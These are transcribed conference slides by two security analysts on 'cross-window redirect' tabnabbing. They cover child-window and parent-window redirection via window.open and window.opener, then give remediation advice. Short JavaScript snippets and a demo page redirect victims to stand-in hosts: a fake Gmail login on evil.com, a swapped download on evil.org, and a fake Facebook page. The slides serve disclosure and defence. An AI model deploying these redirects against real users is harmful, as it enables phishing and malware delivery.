Post on 13-Apr-2017
transcript
Cross Window Redirect
Khaled HawasliMichael Hendrickx
Who are we?• Khaled Hawasli– Manager Security Analysis @ HelpAG
• Michael Hendrickx– Security Analyst @ HelpAG
Preface• Social Engineering
becomes more sophisticated
• People don’t fall for the “click here” trick– Receive email with link– Click link– Presented with login
screen
Cross-Window Redirect• Exploiting opened windows using JS• Unknowingly hyperlink redirections• Works on all browsers• 2 Variants:– Child window redirect– Parent window redirect
Child window redirect• Control the link you just opened
Opens Gmail withwindow.open()
Redirect to fake phishing page
Parent Window
The attackers site (controlling window)
Child Window
The targeted site (controlled window)
childWindow = window.open(‘https://mail.google.com’);childWindow.location = ‘http://mail.google.com.evil.com/gmail/login.php’;
1
2
X-windows redirect demo• Let’s get malware to users– Let’s watch a movie– We need a movie player
http://michaelhendrickx.com/misc/sf.html
X-windows redirect explained• Link to SF to download software– Rewrite the link before the countdown
sf = window.open(‘http://sourceforge.net/...’);setTimeout(function(){ sf.location = ‘http://evil.org/nmap.tar.gz’;
}, 4000);
Multiple ways to attack this:• setTimeout():– Wait for a while and redirect the page.
• Interactive():– Server polling using XHR– Attacker can flip page on demand
• HTML5 Visibility API:– Flip page when user is not looking
https://github.com/ndrix/xwindow-redirect
Parent Window Redirect• “Evil child” can control the parent
1
Opens website with window.open()
Child redirects the parent
Parent Window
The targeted site (controlled window)
Child Window
The attacker site (controlling window)window.open(‘http://mywebsite.com’);
window.opener = ‘http://evil.com/gmail/login.php’;
Parent window redirect: demo• Emirates has some crazy deals!
(Click Facebook message)
Parent window redirect: demo• Emirates has some crazy deals!
<!DOCTYPE html><head><title>Crazy deals from Emirates.com</title></head><body><img src="ek.jpg"/><script>window.opener.location = 'http://fakefacebook.com’;window.location = 'http://www.emirates.com/ae/…';</script></body></html>
Parent window redirect: demo
• User may spend long enough on the target site, believing that Facebook timed out.
Parent Window Child Window1. open child with window.open()
2. Redirect facebook to fake “session logged out”
3. refresh itself to legitimate site
Other sites that use window.open()• Facebook, Amazon widget, …• GMail schema.org
Remediation• Don’t use window.open() to open hyperlinks– Those links may control your page
• Verify if your page was opened from another page– if(window.opener && !window.opener.closed){ ... }
• Preferably, browsers should use X-Frame-Options header for these JS links
Thank you!
Any questions?